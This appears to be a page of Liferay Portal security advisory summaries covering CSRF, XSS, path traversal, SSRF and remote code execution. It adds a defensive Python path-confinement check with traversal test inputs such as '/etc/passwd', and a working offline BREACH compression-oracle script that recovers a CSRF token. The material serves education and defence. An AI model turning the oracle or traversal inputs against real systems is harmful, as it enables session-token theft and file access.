- Cross-Site Request Forgery (CSRF) vulnerability in the server (license) registration page in Liferay Portal and Liferay DXP allows remote attackers to register a server license via the 'orderUuid'...
- Path traversal vulnerability in the downloading and installation of Xuggler in Liferay Portal and Liferay DXP allows remote attackers to (1) add files to arbitrary locations on the server and (2)...
- SessionClicks in Liferay Portal and Liferay DXP does not restrict the saving of request parameters in the HTTP session,... (Liferay Portal 7.4.3.22, Liferay DXP 7.4 Update 10, Liferay DXP 7.3 Update 26)
- Insufficient CSRF protection for omni-administrator users in Liferay Portal and Liferay DXP allows attackers to execute Cross-Site Request Forgery. (Liferay Portal 7.4.3.120, Liferay DXP 2024.Q2.0...)
- The Script Console in Liferay Portal and Liferay DXP does not sufficiently protect against Cross-Site Request Forgery (CSRF) attacks, which allows remote attackers to execute arbitrary... Severity 1.
- The Portal Security module in Liferay Portal 7.2.1 and earlier does not correctly import users from LDAP, which allows remote attackers to prevent a legitimate user from authenticating by...
- Cross-site scripting (XSS) vulnerability in the Server module's script console in Liferay Portal 7.3.2 and earlier allows remote attackers to inject arbitrary web script or HTML via the output of a...
- In the Portal Workflow module in Liferay Portal 6.2.2 through 7.3.2, users' passwords are stored in the database if workflow is enabled for new users. This allows attackers with access to the database...
- Liferay Portal 7.3.3 May 2021 source patch for Liferay Portal 7.2.1. Details for working with source patches can be found on the Patching Liferay Portal page. There is no fix available for Liferay...
- Liferay Portal 7.3.3 May 2021 source patch for Liferay Portal 7.2.1. Details for working with source patches can be found on the Patching Liferay Portal page. There is no fix available for Liferay...
- The Flags module in Liferay Portal 7.3.1 and earlier does not limit the rate at which content can be flagged as inappropriate, which allows remote authenticated users to spam the site administrator...
- Liferay Portal 7.1.0 and earlier is vulnerable to denial-of-service (DoS) attacks via file uploads because of vulnerabilities in Apache Tika. Severity 1. Liferay Portal 7.1.1 March 2020 source patch...
- Liferay Portal 7.0.3 March 2020 source patch for Liferay Portal 6.2.5. Details for working with source patches can be found on the Patching Liferay Portal page. The RSS portlet and FuseMail... (Releases: Liferay Portal 7.0, Liferay Portal 6.2 CE)
- Liferay Portal 6.2.5 and earlier does not properly check permissions, which allows remote authenticated users to impersonate, edit, or delete administrators. Workaround: Remove the User.DELETE,... (Releases: Liferay Portal 6.2 CE)
- Remote code execution vulnerability in DDM templates in Liferay Portal 7.0.0 and earlier allows remote authenticated users with permission to create/edit templates to create templates that can run... (Releases: Liferay Portal 7.0, Liferay Portal 6.2 CE)
- Denial-of-service (DoS) vulnerability in the document library in Liferay Portal 6.2.5 and earlier allows remote attackers to cause an OutOfMemoryError by uploading a crafted PDF file. Workaround: Use... (Releases: Liferay Portal 6.2 CE)
- Remote file disclosure vulnerability in DDM templates in Liferay Portal 6.2.5 and earlier allows remote authenticated users with permission to create/edit templates to view any files that are readable... (Releases: Liferay Portal 6.2 CE)
- March 2020 source patch for Liferay Portal 6.2.5. Details for working with source patches can be found on the Patching Liferay Portal page. The IFrame portlet in Liferay Portal 6.2.5 and earlier... (Releases: Liferay Portal 6.2 CE)
- Server-side request forgery (SSRF) vulnerability in the pingback functionality of blogs in Liferay Portal before 7.1.0 allows remote attackers to send HTTP requests to intranet servers and conduct... (Releases: Liferay Portal 7.0, Liferay Portal 6.2 CE)
- Liferay Portal 7.0.1 March 2020 source patch for Liferay Portal 6.2.5. Details for working with source patches can be found on the Patching Liferay Portal page. Review permissions settings and do... (Releases: Liferay Portal 7.0, Liferay Portal 6.2 CE)
- In Liferay Portal 7.1 CE GA4 and earlier, a potential SQL injection vulnerability exists in the asset framework. Severity 1. March 2020 source patch for Liferay Portal 7.1.3. Details for working with...
- Liferay Portal 7.2.0 and earlier contains a remote code execution (RCE) vulnerability via JSON web services (JSONWS). Workaround: Disable JSONWS by setting the portal.property...
- Liferay Portal 7.1.1 March 2020 source patch for Liferay Portal 7.0.6. Details for working with source patches can be found on the Patching Liferay Portal page. March 2020 source patch for Liferay...
- Liferay Portal 7.1.0 and earlier is vulnerable to remote code execution (RCE) via deserialization of JSON data. Severity 1. Liferay Portal 7.1.1 March 2020 source patch for Liferay Portal 7.0.6....
- Liferay Portal 7.1.0 and earlier contains a path traversal vulnerability in Web Content templates and Application Display Templates (ADT). The vulnerability allows any user with permission to...
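The two path traversal entries in this list (the Xuggler download/installation one and the Web Content/ADT template one above) are the same class of defect: a path taken from the request is joined onto a base directory and used without checking where the joined path actually ends up. The check below is an added example written for this page, not Liferay's code or fix; the directory layout, the file names and the escaping symlink are all constructed inside the demo so it runs offline.

```python
"""Confine a user-supplied path to a base directory (added example, not Liferay code)."""
import os
import tempfile


class PathTraversalError(ValueError):
    """Raised when a user-supplied path would resolve outside the allowed directory."""


def resolve_under(base_dir: str, user_path: str) -> str:
    """Return the absolute path for user_path, confined to base_dir.

    Both sides go through realpath so that '..' segments, absolute paths and
    symlinks are resolved *before* the containment test. Comparing the raw
    joined string instead would let 'sub/../../x', or a symlink that lives
    inside base_dir but points outside it, slip through.
    """
    base = os.path.realpath(base_dir)
    # os.path.join discards base when user_path is absolute, so an absolute
    # input simply becomes that absolute path and fails the prefix test below.
    candidate = os.path.realpath(os.path.join(base, user_path))
    if candidate != base and not candidate.startswith(base + os.sep):
        raise PathTraversalError(f"{user_path!r} escapes {base_dir!r}")
    return candidate


def write_confined(base_dir: str, user_path: str, data: bytes) -> str:
    """Write data at user_path only if it resolves inside base_dir (the
    'add files to arbitrary locations' case from the Xuggler entry)."""
    target = resolve_under(base_dir, user_path)
    os.makedirs(os.path.dirname(target), exist_ok=True)
    with open(target, "wb") as fh:
        fh.write(data)
    return target


def classify(base_dir: str, paths: list) -> dict:
    """Map each candidate path to True (confined) or False (rejected)."""
    results = {}
    for p in paths:
        try:
            resolve_under(base_dir, p)
            results[p] = True
        except PathTraversalError:
            results[p] = False
    return results


def demo() -> dict:
    """Constructed layout: <tmp>/templates is the allowed directory,
    <tmp>/outside is not, and templates/link is a symlink into outside."""
    with tempfile.TemporaryDirectory() as root:
        base = os.path.join(root, "templates")
        outside = os.path.join(root, "outside")
        os.makedirs(base)
        os.makedirs(outside)
        os.symlink(outside, os.path.join(base, "link"))  # constructed escape route
        return classify(base, [
            "page.ftl",            # plain file inside base
            "sub/../page.ftl",     # dot-dot that stays inside base
            "sub/..",              # resolves to base itself
            "../outside/secret",   # classic traversal
            "/etc/passwd",         # absolute path
            "link/secret",         # symlink escape, only caught by realpath
            "..",                  # parent of base
        ])


if __name__ == "__main__":
    for path, allowed in demo().items():
        print(f"{'allow' if allowed else 'REJECT':7} {path}")
```

The symlink case is the one that string-only filters (rejecting `..` or `/` in the input) miss entirely; it is also why the check has to run against the canonical path of the base directory and not just the candidate.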
- Liferay Portal 7.1.0 and earlier is vulnerable to a Server-Side Request Forgery (SSRF) via Web Content templates and Application Display Templates (ADT) which may allow an attacker access to...
- In Liferay Portal 7.0.5 and earlier, the Web Proxy portlet/application allows remote attackers to execute arbitrary code via a supplied stylesheet. Patched versions of the portal will prevent users... (Releases: Liferay Portal 7.0, Liferay Portal 6.2 CE)
- The portal may be vulnerable to BREACH attacks if the portal is using HTTPS and compression (GZip) is enabled. Workaround: Disable compression by setting... (Releases: Liferay Portal 7.0, Liferay Portal 6.2 CE)
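The BREACH entry is the one place in this list where the mechanism is worth seeing end to end, because it explains why the workaround is to turn compression off rather than to patch any one page: as long as a response both reflects attacker-controlled input and contains a per-session secret, the compressed length leaks how much of the secret the attacker has guessed correctly. The script below is an added example, not Liferay code. It builds a constructed HTML page that reflects a query parameter and carries a hidden `p_auth` field (the parameter name Liferay uses for its CSRF token; the rest of the markup and the token value are invented), compresses it with zlib, and recovers the token using nothing but the compressed size. It uses zlib's `Z_FIXED` strategy so the Huffman tables stay constant and the only size variation comes from LZ77 matching; with default dynamic tables the same attack works but needs more samples per guess.

```python
"""Compression-length oracle (BREACH) against a constructed page.

Added example; not Liferay code. The page, the token and the reflected
parameter are all constructed here so the script runs offline.
"""
import zlib

SECRET_TOKEN = "a3f9c1e7b2d4"     # constructed per-session token
ALPHABET = "0123456789abcdef"     # assumed token alphabet
PREFIX = b"value='"               # bytes known to precede the token in the page


def build_page(reflected: bytes, secret: str = SECRET_TOKEN) -> bytes:
    """Constructed server response: reflects an attacker-controlled parameter
    and embeds the session token in a hidden form field.  The attacker only
    ever sees the compressed size of this page, never its contents."""
    return (b"<html><body><p>Search results for: " + reflected + b"</p>"
            b"<form><input type='hidden' name='p_auth' value='"
            + secret.encode() + b"'></form></body></html>")


def compressed_size(page: bytes) -> int:
    """Size of the compressed body as it would cross the wire.  Z_FIXED keeps
    the Huffman tables constant, so a guess that extends the LZ77 match with
    the real token saves a fixed 7-8 bits; with dynamic tables the saving is
    still there but the table itself changes from guess to guess."""
    c = zlib.compressobj(level=6, strategy=zlib.Z_FIXED)
    return len(c.compress(page) + c.flush())


def score(guess: bytes, secret: str = SECRET_TOKEN) -> int:
    """Sum the compressed size over eight paddings of the reflected input.
    Each padding byte is a distinct value >= 0x90, which costs 9 bits under
    fixed Huffman coding, so the eight variants push the final byte boundary
    through every bit offset and a sub-byte saving always shows in the total."""
    return sum(
        compressed_size(build_page(guess + bytes(range(0x90, 0x90 + k)), secret))
        for k in range(8)
    )


def recover_token(length: int = len(SECRET_TOKEN), secret: str = SECRET_TOKEN) -> str:
    """Recover the token one character at a time.  The guess that matches the
    next real character makes the LZ77 match between the reflected text and
    the hidden field one byte longer, so it compresses smaller than the rest."""
    known = ""
    for _ in range(length):
        known += min(ALPHABET, key=lambda ch: score(PREFIX + (known + ch).encode(), secret))
    return known


if __name__ == "__main__":
    print("recovered:", recover_token())
```

Sixteen candidates times eight paddings is 128 requests per character, about 1,500 for the twelve-character token, which is why the practical defences are to stop compressing responses that carry secrets (the advisory's workaround), to make the token change per request, or to pad responses so the length no longer tracks the plaintext.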
- The "doAsUserId" parameter used by administrators for impersonating another user can be leaked to third-party sites. Severity 2. Liferay Portal 7.0.6. (Releases: Liferay Portal 7.0, Liferay Portal 6.2 CE)
- The asset tag API leaks information about the user who created the asset tag. Severity 2. Liferay Portal 7.0.6. (Releases: Liferay Portal 7.0, Liferay Portal 6.2 CE)
- A reflected cross-site scripting (XSS) vulnerability exists on the JSONWS API page. An attacker can potentially exploit this vulnerability to insert malicious JavaScript into a page.... (Releases: Liferay Portal 7.0, Liferay Portal 6.2 CE)
- Content spoofing is possible via URL manipulation in applications that support tags. An attacker can potentially exploit this vulnerability to spoof content and mislead users. Severity 2... (Releases: Liferay Portal 7.0, Liferay Portal 6.2 CE)
- All files within the application's WAR folder are accessible via a crafted URL. Severity 1. Liferay Portal 7.0.5. (Releases: Liferay Portal 7.0, Liferay Portal 6.2 CE)
- Liferay Portal 7.0.5 March 2020 source patch for Liferay Portal 6.2.5. Details for working with source patches can be found on the Patching Liferay Portal page. In Liferay Portal 7.0.4 and earlier,... (Releases: Liferay Portal 7.0, Liferay Portal 6.2 CE)
- In a shared environment (e.g., a computer at a library or internet cafe), a user's reminder query answer may be accessible by another user. Severity 2. Liferay Portal 7.0.4. (Releases: Liferay Portal 7.0, Liferay Portal 6.2 CE)
- A user's email address, screen name or user ID (depending on the authentication method) is exposed in the URL. Severity 2. Liferay Portal 7.0.4. (Releases: Liferay Portal 7.0, Liferay Portal 6.2 CE)
- In Liferay Portal 7.0 CE GA3, Velocity and FreeMarker templates do not properly restrict the use of some variables, which allows any user with permission to create a template to insert arbitrary... (Releases: Liferay Portal 7.0, Liferay Portal 6.2 CE)
- 7.0.3-ce-ga4-security-1.0 patch (source). March 2020 source patch for Liferay Portal 6.2.5. Details for working with source patches can be found on the Patching Liferay Portal page. In Liferay... (Releases: Liferay Portal 7.0, Liferay Portal 6.2 CE)
- In Liferay Portal 7.0 CE GA4, AggregateFilter, MinifierFilter and DynamicCSSFilter allow unauthenticated users to cause a denial of service (disk consumption) via a crafted URL. Severity 1... (Releases: Liferay Portal 7.0, Liferay Portal 6.2 CE)
- Multiple cross-site scripting (XSS) vulnerabilities allow remote attackers to inject arbitrary web script or HTML into a page. Severity 2. Liferay Portal 7.0.0. This issue was reported by Marko Winkler. (Releases: Liferay Portal 6.2 CE)